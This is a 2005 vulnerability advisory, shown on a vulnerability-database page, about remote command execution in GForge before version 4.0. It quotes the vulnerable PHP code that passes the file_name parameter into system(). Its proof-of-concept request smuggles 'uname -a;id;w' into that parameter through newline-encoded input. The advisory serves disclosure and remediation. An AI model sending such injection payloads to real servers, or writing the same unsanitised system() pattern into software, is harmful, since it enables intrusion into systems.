Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

gforgeexec.txt

🗓️ 14 Aug 2005 00:00:00Reported by Filippo Spike MorelliType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 30 Views

Vulnerability in Gforge before version 4.0 allows arbitrary command execution remotely.

Code
`--------------------------------------------------------------------------  
Vendor : Gforge (http://gforge.org)  
Product : gforge  
Affected versions : < 4.0  
Bug fixed : >= 4.0 & Debian pkg 3.1-30  
Vulnerability : Input validation flaw  
Problem-Type : remote  
Severity : High, arbitrary command execution  
  
Author : Filippo Spike Morelli  
--------------------------------------------------------------------------  
  
  
--------------------------------------------------------------------------  
Background  
--------------------------------------------------------------------------  
  
GForge helps you manage the entire development life cycle  
  
GForge has tools to help your team collaborate, like message forums and  
mailing lists; tools to create and control access to Source Code Management  
repositories like CVS and Subversion. GForge automatically creates a  
repository and controls access to it depending on the role settings of the  
project.  
  
--------------------------------------------------------------------------  
Bug Description  
--------------------------------------------------------------------------  
The scm component shipped with gforge has a bug in the viewFile.php script.  
This script is supposed to serve a file info request, outputting its  
history, diffs, and all the other relevant info stored in the repository.  
There is a flaw in the file_name parameter validation, so a properly  
crafted url can lead to arbitrary command execution under the uid the  
webserver runs as.  
  
Files involved:  
$GFORGE/www/scm/viewFile.php  
$GFORGE/common/include/cvsweb/RCSHandler.class  
  
The problem is in "file_name" url field not properly validated.  
  
$GFORGE/www/scm/viewFile.php  
.....  
if($allow)  
{  
$DHD = new DirectoryHandler();  
$FHD = new FileHandler();  
$RCH = new RCSHandler();  
  
$CVSROOT = $GLOBALS['sys_cvsroot_dir'].$cvsroot;  
$DIRNAME = ($file_name != "")?"$file_name":"";  
$DIRNAME = $CVSROOT.$DIRNAME;  
....  
$RCSFile = $DIRNAME.",v";  
switch($view_action)  
{  
case "l":  
if(false === $RCH->getRCSLog($RCSFile))  
echo("Error: ".$RCH->getError());  
.....  
  
$GFORGE/common/include/cvsweb/RCSHandler.class  
RCSHandles class takes care of managing the RCS log and diffs for the  
requested  
file, and it is there that the malicious code is actually executed.  
......  
function getRCSLog($RCSFILE,$REV="all")  
{  
$rev = "";  
if($REV != "all")  
$rev = "-r$REV";  
  
$file = $this->generateTemp();  
$cmd = "rlog $rev $RCSFILE > $file";  
if(false === ($result = system($cmd)))  
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^  
{  
$this->setError("Could not execute '$cmd'");  
return false;  
}  
.....  
  
by system() the malicious code in $cmd is executed.  
  
  
--------------------------------------------------------------------------  
PoC  
--------------------------------------------------------------------------  
  
The analyzed command is "uname -a;id;w"  
  
gforge/xxxx/xx/xx/gforge.log:xxx.xxx.xxx.xxx [xx/xxx/xxxx:xx:xx:xx +xxxx]  
"GET /scm/viewFile.php?group_id=11&file_name=%0Auname%20-a;id;w%0a  
HTTP/1.1" 200 2977  
"-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; MyIE2; Maxthon;  
.NET CLR 1.1.4322)"  
  
----- "file_name=%0Auname%20-a;id;w%0a" -----  
%0a[A] = hexadecimal code for <return>.  
%20 = hexadecimal code for <space>  
---> "file_name=<return>uname -a;id;w<return>"  
  
looking at viewFile.php sourcecode:  
$DIRNAME = ($file_name != "")?"$file_name":"";  
so $DIRNAME = <return>uname -a;id;w<return>  
$RCSFile = $DIRNAME.",v";  
so $RCSFile = <return>uname -a;id;w<return>,v  
...  
$cmd = "rlog $rev $RCSFILE > $file";  
so $cmd = rlog all <return>uname -a;id;w<return>,v > $file  
  
if(false === ($result = system($cmd)))  
and then system executes:  
  
1. rlog all which gives back an error because of the non existing path  
2. <return>  
3. uname -a;id;w  
4. <return>  
5. and eventually the last part of the string, ",v", which gives back the  
error message "sh: ,v: command not found"  
  
--------------------------------------------------------------------------  
Solution  
--------------------------------------------------------------------------  
  
The vendor has been contacted and they promptly worked on a fix. At the time   
of writing the debian package available on Sid (gforge 3.1-30) has been   
fixed. As temporary fix it is possible to disable the scm component. Or just   
upgrade to latest version.  
  
  
regards,  
  
--   
Filippo Spike Morelli - Miu-ft System Administrator  
....................................  
.... follow the white rabbit ....  
... wait no, follow alice, she's so cute...  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
14 Aug 2005 00:00Current
7.4High risk
Vulners AI Score7.4
gforge vulnerability arbitrary command execution input validation flaw remote execution high severity affected versions fixed versions file name parameter
30